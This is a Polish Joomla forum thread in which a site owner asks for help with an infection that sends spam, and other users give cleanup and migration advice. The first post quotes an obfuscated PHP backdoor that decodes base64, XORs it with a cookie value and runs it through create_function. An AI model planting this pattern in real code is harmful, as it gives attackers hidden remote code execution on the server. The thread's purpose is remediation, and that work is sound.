Wyniki 1 do 6 z 6

Temat: Wirus rozsyłający spam

  1. #1
    Debiutant
    Dołączył
    24-10-2017
    Wpisy
    1
    Punkty
    2

    Joomla! 1.5 Wirus rozsyłający spam

    Witam,
    Posiadam stronę działającą na Joomla 1.5, która ostatnio padła ofiarą ataku w wyniku którego został dodany do niej szkodliwy kod. Udało mi się odnaleźć kilka modyfikacji oraz dodanych dodatkowych plików. Mimo usunięcia tych modyfikacji codziennie pojawiają się w losowych miejscach nowe pliki o losowych nazwach i zawartości np.:

    $czsku =
    ciąg dużych i małych liter oraz liczb
    $_ohkrabi = create_function ('$czsku', ohkrabi (base64_decode (
    ciąg dużych i małych liter oraz liczb
    ), $_COOKIE [str_replace('.', '_', $_SERVER['HTTP_HOST'])]) . ';'); $_ohkrabi($czsku);
    function ohkrabi ($uelzo, $jusac) { return $uelzo ^ str_repeat ($jusac, ceil (strlen ($uelzo) / strlen ($jusac))); }

    Przykładowy plik zamieściłem spakowany w załączniku.
    Od firmy hostingowej dostałem informację, że rozsyłany jest ode mnie spam. Planuję podnieść wersję oprogramowania Joomla do wersji 3, ale wpierw chciałbym pozbyć się tego wirusa. Jak można rozwiązać ten problem?
    Pozdrawiam i z góry dziękuję za pomoc.
    Załączone pliki Załączone pliki

  2. Pani Reklamowa
    Pani Reklamowa jest aktywna
    Avatar Panny Google

    Dołączył
    19-08-2010
    Skąd
    Internet
    Postów
    milion
    Pochwał
    setki
  3. #2
    Bywalec
    Dołączył
    21-03-2017
    Wpisy
    151
    Punkty
    42

    Domyślny

    Cytat Wysłane przez WojtekPG Zobacz wiadomość
    Udało mi się odnaleźć kilka modyfikacji oraz dodanych dodatkowych plików.
    Problem w tym że musisz odnaleźć wszystkie modyfikacje + znaleźć i usunąć źródło infekcji (lukę w zabezpieczeniach). Dotyczy całego konta (jeśli to konto jest współdzielone przez kilka domen).

    http://forum.joomla.pl/showthread.ph...l=1#post374914

    A.
    Pomogłem? Kliknij: Pomógł - daj punkt. Dzięki!

  4. #3
    Bywalec
    Dołączył
    03-06-2010
    Wpisy
    285
    Punkty
    27

    Domyślny

    Szkoda twojego czasu. Robię migracje i nie potrzeba pozbywać się wirusów w plikach Starej joomla 1.5.x. Porównujesz katalogi Joomla 1.5 z tymi co masz w głównym katalogu Joomla migrowanej i tylko te przenosisz, które są wgrane dodatkowo. Usuwasz wtedy z nich wszystkie pliki php bo zazwyczaj znajdują się tam pliki graficzne lub pdf i już masz tak jakby problem z głowy, a migracje robisz z bazy. Migrator nie potrzebuje innych plików starej joomla aby działał. Czasem tylko wrzuca się stary plik konfiguracyjny z którego migrator pobierze parametry. Wiesz już o co biega?

  5. #4
    Senior Gall Anonim awatar
    Dołączył
    19-10-2010
    Wpisy
    6 899
    Punkty
    442

    Domyślny

    @Pawelo31 tylko zapomniałeś wspomnieć że w pliki przenoszące "infekcję" mogą również być ukryte pod rozszerzeniem zarezerwowanym dla obrazów. Taki mały drobiazg. Inny kwiatek - to wypreparowane już dane dostępowe z BD lub stworzone takie konto użytkownika. Kolejny kwiatek - to syf na innej witrynie w zakresie tego samego konta hostingowego. Tyle w temacie.

  6. #5
    Nowicjusz matematolek awatar
    Dołączył
    12-11-2008
    Wpisy
    29
    Punkty
    10

    Domyślny

    Hej.

    Z racji tego, że kilka lat temu miałem podobny problem na Joomli 1.5, pozwolę sobie dodać krótki opis mojego przypadku. Może się przyda, może nie, ale pewnie nie zaszkodzi

    Wyglądało to podobnie i codziennie pojawiały się nowe pliki wirusów, a użytkownicy wchodzący na stronę częstowani byli infekcją. Za każdym razem robiłem backup serwera, ale wirusy pojawiały się coraz częściej.

    Okazało się, że jakiś robot loguje się za mnie do mojego konta przez FTP, posługując się moim loginem i hasłem. Najprawdopodobniej został wykradziony z zainstalowanego na komputerze TotalCommandera, któremu pozwoliłem na zapisanie danych logowania.

    Zmieniłem hasło w panelu zrządzania hostingiem i nigdy więcej nie zapisuję haseł w klientach FTP,
    Poprosiłem usługodawcę o pełny backup do stanu, kiedy miałem przypuszczenie, że strona była zdrowa,
    Wykonałem migrację do Joomla 2.X
    i do teraz nic się złego nie dzieje, choć czas będzie pomyśleć o kolejnej migracji.

    Pozdrawiam i powodzenia
    Matołek ((o:

  7. #6
    Bywalec
    Dołączył
    03-06-2010
    Wpisy
    285
    Punkty
    27

    Domyślny

    To wiadomo. Ja i tak skanuje wszystkie pliki antywirusem komputerowym. Później w przemigrowanej Joomla rsfirewalem

Podobne tematy

  1. Skrypt rozsyłający spam jak go znaleźć?
    przez hizel na forum Bezpieczeństwo
    Odpowiedzi: 14
    Ostatni post/autor: 21-02-2017, 17:37
  2. Skrypt rozsyłający spam jak go znaleźć?
    przez hizel na forum Bezpieczeństwo
    Odpowiedzi: 1
    Ostatni post/autor: 21-02-2017, 00:46
  3. PHP/Kryptik.BC - strona rozsyła spam
    przez kamilmaszczyk na forum Bezpieczeństwo
    Odpowiedzi: 9
    Ostatni post/autor: 07-11-2016, 16:20
  4. 1.0.15 rozsyła spam.
    przez stasio na forum Sprawy bezpieczeństwa Joomla!
    Odpowiedzi: 1
    Ostatni post/autor: 10-04-2009, 22:48
  5. Joomla rozsyła spam? Blokada domeny
    przez FXweb na forum Sprawy bezpieczeństwa Joomla!
    Odpowiedzi: 4
    Ostatni post/autor: 28-03-2008, 11:30

Reguły pisania

  • Nie możesz zakładać nowych tematów
  • Nie możesz dodawać wypowiedzi
  • Nie możesz dodawać załączników
  • Nie możesz poprawiać swoich postów
  •